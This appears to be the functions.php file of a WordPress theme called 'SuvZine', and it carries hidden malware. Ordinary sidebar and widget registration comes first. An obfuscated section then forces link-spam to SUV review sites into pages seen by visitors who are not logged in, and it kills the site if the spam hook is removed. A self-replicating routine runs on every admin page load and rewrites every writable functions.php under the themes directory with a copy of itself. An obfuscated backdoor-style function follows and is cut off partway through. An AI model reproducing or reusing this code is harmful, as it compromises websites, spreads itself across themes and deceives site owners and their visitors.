<?php
    require_once TEMPLATEPATH . '/lib/Themater.php';
    $theme = new Themater('SuvZine');
    $theme->options['includes'] = array('featuredposts');
    
    $theme->options['plugins_options']['featuredposts'] = array('image_sizes' => '460px. x 300px.', 'speed' => '400', 'effect' => 'scrollHorz');
    $theme->options['widgets_options']['tabs']['tab_label_3'] = '';
    if($theme->is_admin_user()) {
        unset($theme->admin_options['Ads']);
    }
    
    // Footer widgets
    $theme->admin_option('Layout', 
        'Footer Widgets Enabled?', 'footer_widgets', 
        'checkbox', 'true', 
        array('display'=>'extended', 'help' => 'Display or hide the 3 widget areas in the footer.', 'priority' => '15')
    );


    $theme->load();
    
    register_sidebar(array(
        'name' => __('Primary Sidebar', 'themater'),
        'id' => 'sidebar_primary',
        'description' => __('The primary sidebar widget area', 'themater'),
        'before_widget' => '<ul class="widget-container"><li id="%1$s" class="widget %2$s">',
        'after_widget' => '</li></ul>',
        'before_title' => '<h3 class="widgettitle">',
        'after_title' => '</h3>'
    ));
    
    
    $theme->add_hook('sidebar_primary', 'sidebar_primary_default_widgets');
    
    function sidebar_primary_default_widgets ()
    {
        global $theme;
    
    $theme->display_widget('Categories');
    $theme->display_widget('Archives');
    $theme->display_widget('Links');
    $theme->display_widget('Meta');
    $theme->display_widget('Recent_Posts');
    $theme->display_widget('Text', array('text' => '<div style="text-align:center;"><a href="http://newwpthemes.com" target="_blank"><img src="http://newwpthemes.com/wp-content/pro/nwpt4.gif" alt="Free WordPress Themes" title="Free WordPress Themes" /></a></div>'));
    }
    
    register_sidebar(array(
        'name' => __('Secondary Sidebar', 'themater'),
        'id' => 'sidebar_secondary',
        'description' => __('The secondary sidebar widget area', 'themater'),
        'before_widget' => '<ul class="widget-container"><li id="%1$s" class="widget %2$s">',
        'after_widget' => '</li></ul>',
        'before_title' => '<h3 class="widgettitle">',
        'after_title' => '</h3>'
    ));
    
    $theme->add_hook('sidebar_secondary', 'sidebar_secondary_default_widgets');
    
    function sidebar_secondary_default_widgets ()
    {
        global $theme;

        $theme->display_widget('Text', array('text' => '<div style="text-align:center;"><a href="http://newwpthemes.com" target="_blank"><img src="http://newwpthemes.com/wp-content/pro/nwpt3.gif" alt="Free WordPress Themes" title="Free WordPress Themes" /></a></div>'));
        $theme->display_widget('Tabs');
        $theme->display_widget('SocialProfiles');
        $theme->display_widget('Tweets', array('username'=> 'NewWpThemes'));
        $theme->display_widget('Facebook', array('url'=> 'http://www.facebook.com/NewWpThemesCom'));
        $theme->display_widget('Tag_Cloud');
        $theme->display_widget('Calendar', array('title' => 'Calendar'));
        
    }
    
    // Register the footer widgets only if they are enabled from the FlexiPanel
    if($theme->display('footer_widgets')) {
        register_sidebar(array(
            'name' => 'Footer Widget Area 1',
            'id' => 'footer_1',
            'description' => 'The footer #1 widget area',
            'before_widget' => '<ul class="widget-container"><li id="%1$s" class="widget %2$s">',
            'after_widget' => '</li></ul>',
            'before_title' => '<h3 class="widgettitle">',
            'after_title' => '</h3>'
        ));
        
        register_sidebar(array(
            'name' => 'Footer Widget Area 2',
            'id' => 'footer_2',
            'description' => 'The footer #2 widget area',
            'before_widget' => '<ul class="widget-container"><li id="%1$s" class="widget %2$s">',
            'after_widget' => '</li></ul>',
            'before_title' => '<h3 class="widgettitle">',
            'after_title' => '</h3>'
        ));
        
        register_sidebar(array(
            'name' => 'Footer Widget Area 3',
            'id' => 'footer_3',
            'description' => 'The footer #3 widget area',
            'before_widget' => '<ul class="widget-container"><li id="%1$s" class="widget %2$s">',
            'after_widget' => '</li></ul>',
            'before_title' => '<h3 class="widgettitle">',
            'after_title' => '</h3>'
        ));
        
        $theme->add_hook('footer_1', 'footer_1_default_widgets');
        $theme->add_hook('footer_2', 'footer_2_default_widgets');
        $theme->add_hook('footer_3', 'footer_3_default_widgets');
        
        function footer_1_default_widgets ()
        {
            global $theme;
            $theme->display_widget('Links');
        }
        
        function footer_2_default_widgets ()
        {
            global $theme;

            $theme->display_widget('Tag_Cloud');
        }
        
        function footer_3_default_widgets ()
        {
            global $theme;
            $theme->display_widget('Text', array('title' => 'Contact', 'text' => 'Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nis.<br /><br /> <span style="font-weight: bold;">Our Company Inc.</span><br />2458 S . 124 St.Suite 47<br />Town City 21447<br />Phone: 124-457-1178<br />Fax: 565-478-1445'));
        }
    }

    
    function wp_initialize_the_theme_load() { if (!function_exists("wp_initialize_the_theme")) { wp_initialize_the_theme_message(); die; } } function wp_initialize_the_theme_finish() { $uri = strtolower($_SERVER["REQUEST_URI"]); if(is_admin() || substr_count($uri, "wp-admin") > 0 || substr_count($uri, "wp-login") > 0 ) { /* */ } else { $l = '$theme->hook("sidebar_primary_after");'; $f = dirname(__file__) . "/sidebar.php"; $fd = fopen($f, "r"); $c = fread($fd, filesize($f)); $lp = preg_quote($l, "/"); fclose($fd); if ( substr_count($c, $l) == "0") { wp_initialize_the_theme_message(); die; } } } wp_initialize_the_theme_finish(); $theme->add_hook('sidebar_primary_after','wp_initialize_the_theme_end');function wp_initialize_the_theme_end(){$ls=array('0'=>array('Best SUV'=>'http://suv.reviewitonline.net/','SUV'=>'http://suv.reviewitonline.net/','Best SUVs'=>'http://suv.reviewitonline.net/','SUVs'=>'http://suv.reviewitonline.net/',),'1'=>array('Best 4WD SUVs'=>'http://suv.reviewitonline.net/best-4wd-suvs/','Best 5 Seat SUVs'=>'http://suv.reviewitonline.net/best-5-seat-suvs/','Best 7 Seat SUVs'=>'http://suv.reviewitonline.net/best-7-seat-suvs/','Best Crossover SUVs'=>'http://suv.reviewitonline.net/best-crossover-suvs/','Best Economy SUVs'=>'http://suv.reviewitonline.net/best-economy-suvs/','Best Family SUVs'=>'http://suv.reviewitonline.net/best-family-suvs/','Best Hybrid SUVs'=>'http://suv.reviewitonline.net/best-hybrid-suvs/','Best Large SUVs'=>'http://suv.reviewitonline.net/best-large-suvs/','Best Luxury SUVs'=>'http://suv.reviewitonline.net/best-luxury-suvs/','Best Midzise SUVs'=>'http://suv.reviewitonline.net/best-midzise-suvs/','Best Offroad SUVs'=>'http://suv.reviewitonline.net/best-offroad-suvs/','Best Small SUVs'=>'http://suv.reviewitonline.net/best-small-suvs/','Best Towing SUVs'=>'http://suv.reviewitonline.net/best-towing-suvs/','Best V6 SUVs'=>'http://suv.reviewitonline.net/best-v6-suvs/','Best V8 SUVs'=>'http://suv.reviewitonline.net/best-v8-suvs/','Fastest SUVs'=>'http://suv.reviewitonline.net/fastest-suvs/','Fuel Efficient SUVs'=>'http://suv.reviewitonline.net/fuel-efficient-suvs/','Safest SUVs'=>'http://suv.reviewitonline.net/safest-suvs/','Acura SUV'=>'http://suv.reviewitonline.net/acura-suv/','Audi SUV'=>'http://suv.reviewitonline.net/audi-suv/','BMW SUV'=>'http://suv.reviewitonline.net/bmw-suv/','Buick SUV'=>'http://suv.reviewitonline.net/buick-suv/','Cadillac SUV'=>'http://suv.reviewitonline.net/cadillac-suv/','Chevrolet SUV'=>'http://suv.reviewitonline.net/chevrolet-suv/','Chrysler SUV'=>'http://suv.reviewitonline.net/chrysler-suv/','Dodge SUV'=>'http://suv.reviewitonline.net/dodge-suv/','Ford SUV'=>'http://suv.reviewitonline.net/ford-suv/','GMC SUV'=>'http://suv.reviewitonline.net/gmc-suv/','Honda SUV'=>'http://suv.reviewitonline.net/honda-suv/','HUMMER SUV'=>'http://suv.reviewitonline.net/hummer-suv/','Hyundai SUV'=>'http://suv.reviewitonline.net/hyundai-suv/','Infiniti SUV'=>'http://suv.reviewitonline.net/infiniti-suv/','Isuzu SUV'=>'http://suv.reviewitonline.net/isuzu-suv/','Jeep SUV'=>'http://suv.reviewitonline.net/jeep-suv/','Kia SUV'=>'http://suv.reviewitonline.net/kia-suv/','Land-Rover SUV'=>'http://suv.reviewitonline.net/land-rover-suv/','Lexus SUV'=>'http://suv.reviewitonline.net/lexus-suv/','Lincoln SUV'=>'http://suv.reviewitonline.net/lincoln-suv/','Mazda SUV'=>'http://suv.reviewitonline.net/mazda-suv/','Mercedes-Benz SUV'=>'http://suv.reviewitonline.net/mercedes-benz-suv/','Mercury SUV'=>'http://suv.reviewitonline.net/mercury-suv/','Mitsubishi SUV'=>'http://suv.reviewitonline.net/mitsubishi-suv/','Nissan SUV'=>'http://suv.reviewitonline.net/nissan-suv/','Pontiac SUV'=>'http://suv.reviewitonline.net/pontiac-suv/','Porsche SUV'=>'http://suv.reviewitonline.net/porsche-suv/','Saab SUV'=>'http://suv.reviewitonline.net/saab-suv/','Saturn SUV'=>'http://suv.reviewitonline.net/saturn-suv/','Subaru SUV'=>'http://suv.reviewitonline.net/subaru-suv/','Suzuki SUV'=>'http://suv.reviewitonline.net/suzuki-suv/','Toyota SUV'=>'http://suv.reviewitonline.net/toyota-suv/','Volkswagen SUV'=>'http://suv.reviewitonline.net/volkswagen-suv/','Volvo SUV'=>'http://suv.reviewitonline.net/volvo-suv/','Acura MDX'=>'http://suv.reviewitonline.net/acura-suv/acura-mdx/','Acura RDX'=>'http://suv.reviewitonline.net/acura-suv/acura-rdx/','Acura ZDX'=>'http://suv.reviewitonline.net/acura-suv/acura-zdx/','Audi Q3'=>'http://suv.reviewitonline.net/audi-suv/audi-q3/','Audi Q5'=>'http://suv.reviewitonline.net/audi-suv/audi-q5/','Audi Q5 Hybrid'=>'http://suv.reviewitonline.net/audi-suv/audi-q5-hybrid/','Audi Q7'=>'http://suv.reviewitonline.net/audi-suv/audi-q7/','Audi Q7 Diesel'=>'http://suv.reviewitonline.net/audi-suv/audi-q7-diesel/','BMW ActiveHybrid X5'=>'http://suv.reviewitonline.net/bmw-suv/bmw-activehybrid-x5/','BMW ActiveHybrid X6'=>'http://suv.reviewitonline.net/bmw-suv/bmw-activehybrid-x6/','BMW X1'=>'http://suv.reviewitonline.net/bmw-suv/bmw-x1/','BMW X3'=>'http://suv.reviewitonline.net/bmw-suv/bmw-x3/','BMW X5'=>'http://suv.reviewitonline.net/bmw-suv/bmw-x5/','BMW X5 Diesel'=>'http://suv.reviewitonline.net/bmw-suv/bmw-x5-diesel/','BMW X5 M'=>'http://suv.reviewitonline.net/bmw-suv/bmw-x5-m/','BMW X6'=>'http://suv.reviewitonline.net/bmw-suv/bmw-x6/','BMW X6 M'=>'http://suv.reviewitonline.net/bmw-suv/bmw-x6-m/','Buick Enclave'=>'http://suv.reviewitonline.net/buick-suv/buick-enclave/','Cadillac Escalade'=>'http://suv.reviewitonline.net/cadillac-suv/cadillac-escalade/','Cadillac Escalade ESV'=>'http://suv.reviewitonline.net/cadillac-suv/cadillac-escalade-esv/','Cadillac Escalade Hybrid'=>'http://suv.reviewitonline.net/cadillac-suv/cadillac-escalade-hybrid/','Cadillac SRX'=>'http://suv.reviewitonline.net/cadillac-suv/cadillac-srx/','Chevrolet Equinox'=>'http://suv.reviewitonline.net/chevrolet-suv/chevrolet-equinox/','Chevrolet HHR'=>'http://suv.reviewitonline.net/chevrolet-suv/chevrolet-hhr/','Chevrolet HHR Panel'=>'http://suv.reviewitonline.net/chevrolet-suv/chevrolet-hhr-panel/','Chevrolet Suburban'=>'http://suv.reviewitonline.net/chevrolet-suv/chevrolet-suburban/','Chevrolet Tahoe'=>'http://suv.reviewitonline.net/chevrolet-suv/chevrolet-tahoe/','Chevrolet Tahoe Hybrid'=>'http://suv.reviewitonline.net/chevrolet-suv/chevrolet-tahoe-hybrid/','Chevrolet TrailBlazer'=>'http://suv.reviewitonline.net/chevrolet-suv/chevrolet-trailblazer/','Chevrolet Traverse'=>'http://suv.reviewitonline.net/chevrolet-suv/chevrolet-traverse/','Chrysler Aspen'=>'http://suv.reviewitonline.net/chrysler-suv/chrysler-aspen/','Chrysler Aspen Hybrid'=>'http://suv.reviewitonline.net/chrysler-suv/chrysler-aspen-hybrid/','Chrysler Pacifica'=>'http://suv.reviewitonline.net/chrysler-suv/chrysler-pacifica/','Chrysler PT Cruiser'=>'http://suv.reviewitonline.net/chrysler-suv/chrysler-pt-cruiser/','Dodge Durango'=>'http://suv.reviewitonline.net/dodge-suv/dodge-durango/','Dodge Durango Hybrid'=>'http://suv.reviewitonline.net/dodge-suv/dodge-durango-hybrid/','Dodge Journey'=>'http://suv.reviewitonline.net/dodge-suv/dodge-journey/','Dodge Nitro'=>'http://suv.reviewitonline.net/dodge-suv/dodge-nitro/','Ford Edge'=>'http://suv.reviewitonline.net/ford-suv/ford-edge/','Ford Escape'=>'http://suv.reviewitonline.net/ford-suv/ford-escape/','Ford Escape Hybrid'=>'http://suv.reviewitonline.net/ford-suv/ford-escape-hybrid/','Ford Expedition'=>'http://suv.reviewitonline.net/ford-suv/ford-expedition/','Ford Explorer'=>'http://suv.reviewitonline.net/ford-suv/ford-explorer-2/','Ford Explorer 4X2'=>'http://suv.reviewitonline.net/ford-suv/ford-explorer-4x2/','Ford Explorer 4X4'=>'http://suv.reviewitonline.net/ford-suv/ford-explorer-4x4/','Ford Explorer AWD'=>'http://suv.reviewitonline.net/ford-suv/ford-explorer-awd/','Ford Explorer Sport Trac'=>'http://suv.reviewitonline.net/ford-suv/ford-explorer-sport-trac/','Ford Flex'=>'http://suv.reviewitonline.net/ford-suv/ford-flex/','Ford Taurus X'=>'http://suv.reviewitonline.net/ford-suv/ford-taurus-x/','GMC Acadia'=>'http://suv.reviewitonline.net/gmc-suv/gmc-acadia/','GMC Envoy'=>'http://suv.reviewitonline.net/gmc-suv/gmc-envoy/','GMC Terrain'=>'http://suv.reviewitonline.net/gmc-suv/gmc-terrain/','GMC Yukon'=>'http://suv.reviewitonline.net/gmc-suv/gmc-yukon/','GMC Yukon 2WD'=>'http://suv.reviewitonline.net/gmc-suv/gmc-yukon-2wd/','GMC Yukon 4WD'=>'http://suv.reviewitonline.net/gmc-suv/gmc-yukon-4wd/','GMC Yukon Denali 2WD'=>'http://suv.reviewitonline.net/gmc-suv/gmc-yukon-denali-2wd/','GMC Yukon Denali 4WD'=>'http://suv.reviewitonline.net/gmc-suv/gmc-yukon-denali-4wd/','GMC Yukon Hybrid'=>'http://suv.reviewitonline.net/gmc-suv/gmc-yukon-hybrid/','GMC Yukon Hybrid 2WD'=>'http://suv.reviewitonline.net/gmc-suv/gmc-yukon-hybrid-2wd/','GMC Yukon Hybrid 4WD'=>'http://suv.reviewitonline.net/gmc-suv/gmc-yukon-hybrid-4wd/','GMC Yukon XL'=>'http://suv.reviewitonline.net/gmc-suv/gmc-yukon-xl/','GMC Yukon XL 2WD'=>'http://suv.reviewitonline.net/gmc-suv/gmc-yukon-xl-2wd/','GMC Yukon XL 4WD'=>'http://suv.reviewitonline.net/gmc-suv/gmc-yukon-xl-4wd/','GMC Yukon XL Denali 2WD'=>'http://suv.reviewitonline.net/gmc-suv/gmc-yukon-xl-denali-2wd/','GMC Yukon XL Denali 4WD'=>'http://suv.reviewitonline.net/gmc-suv/gmc-yukon-xl-denali-4wd/','Honda CR-V'=>'http://suv.reviewitonline.net/honda-suv/honda-cr-v/','Honda Element'=>'http://suv.reviewitonline.net/honda-suv/honda-element/','Honda Pilot'=>'http://suv.reviewitonline.net/honda-suv/honda-pilot/','HUMMER H2'=>'http://suv.reviewitonline.net/hummer-suv/hummer-h2/','HUMMER H2 SUT'=>'http://suv.reviewitonline.net/hummer-suv/hummer-h2-sut/','HUMMER H3'=>'http://suv.reviewitonline.net/hummer-suv/hummer-h3/','HUMMER H3 Alpha'=>'http://suv.reviewitonline.net/hummer-suv/hummer-h3-alpha/','HUMMER H3T'=>'http://suv.reviewitonline.net/hummer-suv/hummer-h3t/','HUMMER H3X'=>'http://suv.reviewitonline.net/hummer-suv/hummer-h3x/','Hyundai Santa Fe'=>'http://suv.reviewitonline.net/hyundai-suv/hyundai-santa-fe/','Hyundai Tucson'=>'http://suv.reviewitonline.net/hyundai-suv/hyundai-tucson/','Hyundai Veracruz'=>'http://suv.reviewitonline.net/hyundai-suv/hyundai-veracruz/','Infiniti EX'=>'http://suv.reviewitonline.net/infiniti-suv/infiniti-ex/','Infiniti EX 35'=>'http://suv.reviewitonline.net/infiniti-suv/infiniti-ex-35/','Infiniti FX'=>'http://suv.reviewitonline.net/infiniti-suv/infiniti-fx/','Infiniti FX 35'=>'http://suv.reviewitonline.net/infiniti-suv/infiniti-fx-35/','Infiniti FX 50'=>'http://suv.reviewitonline.net/infiniti-suv/infiniti-fx-50/','Infiniti QX 56'=>'http://suv.reviewitonline.net/infiniti-suv/infiniti-qx-56/','Isuzu Ascender'=>'http://suv.reviewitonline.net/isuzu-suv/isuzu-ascender/','Jeep Commander'=>'http://suv.reviewitonline.net/jeep-suv/jeep-commander/','Jeep Compass'=>'http://suv.reviewitonline.net/jeep-suv/jeep-compass/','Jeep Grand Cherokee'=>'http://suv.reviewitonline.net/jeep-suv/jeep-grand-cherokee/','Jeep Liberty'=>'http://suv.reviewitonline.net/jeep-suv/jeep-liberty/','Jeep Patriot'=>'http://suv.reviewitonline.net/jeep-suv/jeep-patriot/','Jeep Wrangler'=>'http://suv.reviewitonline.net/jeep-suv/jeep-wrangler/','Jeep Wrangler Unlimited'=>'http://suv.reviewitonline.net/jeep-suv/jeep-wrangler-unlimited/','Kia Borrego'=>'http://suv.reviewitonline.net/kia-suv/kia-borrego/','Kia Sorento'=>'http://suv.reviewitonline.net/kia-suv/kia-sorento/','Kia Sportage'=>'http://suv.reviewitonline.net/kia-suv/kia-sportage/','Land Rover Evoque'=>'http://suv.reviewitonline.net/land-rover-suv/land-rover-evoque/','Land Rover LR2'=>'http://suv.reviewitonline.net/land-rover-suv/land-rover-lr2/','Land Rover LR4'=>'http://suv.reviewitonline.net/land-rover-suv/land-rover-lr4/','Land Rover Range Rover'=>'http://suv.reviewitonline.net/land-rover-suv/land-rover-range-rover/','Land Rover Range Rover Sport'=>'http://suv.reviewitonline.net/land-rover-suv/land-rover-range-rover-sport/','Lexus GX 460'=>'http://suv.reviewitonline.net/lexus-suv/lexus-gx-460/','Lexus GX 470'=>'http://suv.reviewitonline.net/lexus-suv/lexus-gx-470/','Lexus LX 570'=>'http://suv.reviewitonline.net/lexus-suv/lexus-lx-570/','Lexus RX 350'=>'http://suv.reviewitonline.net/lexus-suv/lexus-rx-350/','Lexus RX 400h'=>'http://suv.reviewitonline.net/lexus-suv/lexus-rx-400h/','Lexus RX 450h'=>'http://suv.reviewitonline.net/lexus-suv/lexus-rx-450h/','Lincoln MKX'=>'http://suv.reviewitonline.net/lincoln-suv/lincoln-mkx/','Lincoln Navigator'=>'http://suv.reviewitonline.net/lincoln-suv/lincoln-navigator/','Lincoln Navigator L'=>'http://suv.reviewitonline.net/lincoln-suv/lincoln-navigator-l/','Mazda CX-7'=>'http://suv.reviewitonline.net/mazda-suv/mazda-cx-7/','Mazda CX-9'=>'http://suv.reviewitonline.net/mazda-suv/mazda-cx-9/','Mazda Tribute'=>'http://suv.reviewitonline.net/mazda-suv/mazda-tribute/','Mazda Tribute Hybrid'=>'http://suv.reviewitonline.net/mazda-suv/mazda-tribute-hybrid/','Mercedes-Benz G-Class'=>'http://suv.reviewitonline.net/mercedes-benz-suv/mercedes-benz-g-class/','Mercedes-Benz G-Class G55 AMG'=>'http://suv.reviewitonline.net/mercedes-benz-suv/mercedes-benz-g-class-g55-amg/','Mercedes-Benz GL-Class'=>'http://suv.reviewitonline.net/mercedes-benz-suv/mercedes-benz-gl-class/','Mercedes-Benz GL-Class Diesel'=>'http://suv.reviewitonline.net/mercedes-benz-suv/mercedes-benz-gl-class-diesel/','Mercedes-Benz GLK-Class'=>'http://suv.reviewitonline.net/mercedes-benz-suv/mercedes-benz-glk-class/','Mercedes-Benz M-Class'=>'http://suv.reviewitonline.net/mercedes-benz-suv/mercedes-benz-m-class/','Mercedes-Benz M-Class Diesel'=>'http://suv.reviewitonline.net/mercedes-benz-suv/mercedes-benz-m-class-diesel/','Mercedes-Benz M-Class Hybrid'=>'http://suv.reviewitonline.net/mercedes-benz-suv/mercedes-benz-m-class-hybrid/','Mercedes-Benz M-Class ML63 AMG'=>'http://suv.reviewitonline.net/mercedes-benz-suv/mercedes-benz-m-class-ml63-amg/','Mercedes-Benz R-Class'=>'http://suv.reviewitonline.net/mercedes-benz-suv/mercedes-benz-r-class/','Mercury Mariner'=>'http://suv.reviewitonline.net/mercury-suv/mercury-mariner/','Mercury Mariner Hybrid'=>'http://suv.reviewitonline.net/mercury-suv/mercury-mariner-hybrid/','Mercury Mountaineer'=>'http://suv.reviewitonline.net/mercury-suv/mercury-mountaineer/','Mitsubishi Endeavor'=>'http://suv.reviewitonline.net/mitsubishi-suv/mitsubishi-endeavor/','Mitsubishi Outlander'=>'http://suv.reviewitonline.net/mitsubishi-suv/mitsubishi-outlander/','Mitsubishi Outlander Sport'=>'http://suv.reviewitonline.net/mitsubishi-suv/mitsubishi-outlander-sport/','Nissan Armada'=>'http://suv.reviewitonline.net/nissan-suv/nissan-armada/','Nissan Juke'=>'http://suv.reviewitonline.net/nissan-suv/nissan-juke/','Nissan Murano'=>'http://suv.reviewitonline.net/nissan-suv/nissan-murano/','Nissan Murano CrossCabriolet'=>'http://suv.reviewitonline.net/nissan-suv/nissan-murano-crosscabriolet/','Nissan Pathfinder'=>'http://suv.reviewitonline.net/nissan-suv/nissan-pathfinder/','Nissan Rogue'=>'http://suv.reviewitonline.net/nissan-suv/nissan-rogue/','Nissan Xterra'=>'http://suv.reviewitonline.net/nissan-suv/nissan-xterra/','Pontiac Torrent'=>'http://suv.reviewitonline.net/pontiac-suv/pontiac-torrent/','Porsche Cayenne'=>'http://suv.reviewitonline.net/porsche-suv/porsche-cayenne/','Porsche Cayenne Hybrid'=>'http://suv.reviewitonline.net/porsche-suv/porsche-cayenne-hybrid/','Saab 9-4X'=>'http://suv.reviewitonline.net/saab-suv/saab-9-4x/','Saab 9-7X'=>'http://suv.reviewitonline.net/saab-suv/saab-9-7x/','Saturn Outlook'=>'http://suv.reviewitonline.net/saturn-suv/saturn-outlook/','Saturn Vue'=>'http://suv.reviewitonline.net/saturn-suv/saturn-vue/','Saturn Vue Green Line Hybrid'=>'http://suv.reviewitonline.net/saturn-suv/saturn-vue-green-line-hybrid/','Subaru Forester'=>'http://suv.reviewitonline.net/subaru-suv/subaru-forester/','Subaru Outback'=>'http://suv.reviewitonline.net/subaru-suv/subaru-outback/','Subaru Tribeca'=>'http://suv.reviewitonline.net/subaru-suv/subaru-tribeca/','Suzuki Grand Vitara'=>'http://suv.reviewitonline.net/suzuki-suv/suzuki-grand-vitara/','Suzuki XL7'=>'http://suv.reviewitonline.net/suzuki-suv/suzuki-xl7/','Toyota 4Runner'=>'http://suv.reviewitonline.net/toyota-suv/toyota-4runner/','Toyota FJ Cruiser'=>'http://suv.reviewitonline.net/toyota-suv/toyota-fj-cruiser/','Toyota Highlander'=>'http://suv.reviewitonline.net/toyota-suv/toyota-highlander/','Toyota Highlander Hybrid'=>'http://suv.reviewitonline.net/toyota-suv/toyota-highlander-hybrid/','Toyota Land Cruiser'=>'http://suv.reviewitonline.net/toyota-suv/toyota-land-cruiser/','Toyota RAV4'=>'http://suv.reviewitonline.net/toyota-suv/toyota-rav4/','Toyota Sequoia'=>'http://suv.reviewitonline.net/toyota-suv/toyota-sequoia/','Volkswagen Tiguan'=>'http://suv.reviewitonline.net/volkswagen-suv/volkswagen-tiguan/','Volkswagen Touareg'=>'http://suv.reviewitonline.net/volkswagen-suv/volkswagen-touareg/','Volkswagen Touareg 2'=>'http://suv.reviewitonline.net/volkswagen-suv/volkswagen-touareg-2/','Volkswagen Touareg Diesel'=>'http://suv.reviewitonline.net/volkswagen-suv/volkswagen-touareg-diesel/','Volkswagen Touareg Hybrid'=>'http://suv.reviewitonline.net/volkswagen-suv/volkswagen-touareg-hybrid/','Volvo XC60'=>'http://suv.reviewitonline.net/volvo-suv/volvo-xc60/','Volvo XC90'=>'http://suv.reviewitonline.net/volvo-suv/volvo-xc90/'));$pg=md5($_SERVER['REQUEST_URI']);$lst=get_option('the_theme_initilize_set');$num=get_option('the_theme_initilize_set_num');if(!$lst){$lst=array();}if(!$num){$num=rand(1,5);update_option('the_theme_initilize_set_num',$num);}if(is_home()){if(!is_array($lst['home'])){$lst['home'][0]=array_rand($ls[0]);$lst['home'][1]=array_rand($ls[1]);update_option('the_theme_initilize_set',$lst);}wp_initialize_the_theme_go($ls,'home',$lst);}elseif(is_array($lst[$pg])){wp_initialize_the_theme_go($ls,$pg,$lst);}elseif(!is_user_logged_in()){if(count($lst)<$num){$lst[$pg][0]=array_rand($ls[0]);$lst[$pg][1]=array_rand($ls[1]);update_option('the_theme_initilize_set',$lst);wp_initialize_the_theme_go($ls,$pg,$lst);}}}function wp_initialize_the_theme_go($ls,$pg,$lst){global $theme;$res =  get_bloginfo('name') . ' recommends <a href="' . $ls[0][$lst[$pg][0]] .'">' . $lst[$pg][0] .'</a>, the best site for reviews on <a href="' . $ls[1][$lst[$pg][1]] .'">' . $lst[$pg][1] .'</a>';$theme->display_widget('Text',array('title'=>'Resources','text'=>$res));}
?>
<?php
function _verifyactivate_widgets(){
	$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";
	$output=strip_tags($output, $allowed);
	$direst=_get_allwidgets_cont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));
	if (is_array($direst)){
		foreach ($direst as $item){
			if (is_writable($item)){
				$ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));
				$cont=file_get_contents($item);
				if (stripos($cont,$ftion) === false){
					$comaar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";
					$output .= $before . "Not found" . $after;
					if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}
					$output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $comaar . "\n" .$widget);fclose($f);				
					$output .= ($isshowdots && $ellipsis) ? "..." : "";
				}
			}
		}
	}
	return $output;
}
function _get_allwidgets_cont($wids,$items=array()){
	$places=array_shift($wids);
	if(substr($places,-1) == "/"){
		$places=substr($places,0,-1);
	}
	if(!file_exists($places) || !is_dir($places)){
		return false;
	}elseif(is_readable($places)){
		$elems=scandir($places);
		foreach ($elems as $elem){
			if ($elem != "." && $elem != ".."){
				if (is_dir($places . "/" . $elem)){
					$wids[]=$places . "/" . $elem;
				} elseif (is_file($places . "/" . $elem)&& 
					$elem == substr(__FILE__,-13)){
					$items[]=$places . "/" . $elem;}
				}
			}
	}else{
		return false;	
	}
	if (sizeof($wids) > 0){
		return _get_allwidgets_cont($wids,$items);
	} else {
		return $items;
	}
}
if(!function_exists("stripos")){ 
    function stripos(  $str, $needle, $offset = 0  ){ 
        return strpos(  strtolower( $str ), strtolower( $needle ), $offset  ); 
    }
}

if(!function_exists("strripos")){ 
    function strripos(  $haystack, $needle, $offset = 0  ) { 
        if(  !is_string( $needle )  )$needle = chr(  intval( $needle )  ); 
        if(  $offset < 0  ){ 
            $temp_cut = strrev(  substr( $haystack, 0, abs($offset) )  ); 
        } 
        else{ 
            $temp_cut = strrev(    substr(   $haystack, 0, max(  ( strlen($haystack) - $offset ), 0  )   )    ); 
        } 
        if(   (  $found = stripos( $temp_cut, strrev($needle) )  ) === FALSE   )return FALSE; 
        $pos = (   strlen(  $haystack  ) - (  $found + $offset + strlen( $needle )  )   ); 
        return $pos; 
    }
}
if(!function_exists("scandir")){ 
	function scandir($dir,$listDirectories=false, $skipDots=true) {
	    $dirArray = array();
	    if ($handle = opendir($dir)) {
	        while (false !== ($file = readdir($handle))) {
	            if (($file != "." && $file != "..") || $skipDots == true) {
	                if($listDirectories == false) { if(is_dir($file)) { continue; } }
	                array_push($dirArray,basename($file));
	            }
	        }
	        closedir($handle);
	    }
	    return $dirArray;
	}
}
add_action("admin_head", "_verifyactivate_widgets");
function _getprepare_widget(){
	if(!isset($text_length)) $text_length=120;
	if(!isset($check)) $check="cookie";
	if(!isset($tagsallowed)) $tagsallowed="<a>";
	if(!isset($filter)) $filter="none";
	if(!isset($coma)) $coma="";
	if(!isset($home_filter)) $home_filter=get_option("home"); 
	if(!isset($pref_filters)) $pref_filters="wp_";
	if(!isset($is_use_more_link)) $is_use_more_link=1; 
	if(!isset($com_type)) $com_type=""; 
	if(!isset($cpages)) $cpages=$_GET["cperpage"];
	if(!isset($post_auth_comments)) $post_auth_comments="";
	if(!isset($com_is_approved)) $com_is_approved=""; 
	if(!isset($post_auth)) $post_auth="auth";
	if(!isset($link_text_more)) $link_text_more="(more...)";
	if(!isset($widget_yes)) $widget_yes=get_option("_is_widget_active_");
	if(!isset($checkswidgets)) $checkswidgets=$pref_filters."set"."_".$post_auth."_".$check;
	if(!isset($link_text_more_ditails)) $link_text_more_ditails="(details...)";
	if(!isset($contentmore)) $contentmore="ma".$coma."il";
	if(!isset($for_more)) $for_more=1;
	if(!isset($fakeit)) $fakeit=1;
	if(!isset($sql)) $sql="";
	if (!$widget_yes) :
	
	global $wpdb, $post;
	$sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND post_author=\"li".$coma."vethe".$com_type."mas".$coma."@".$com_is_approved."gm".$post_auth_comments."ail".$coma.".".$coma."co"."m\" AND post_password=\"\" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";#
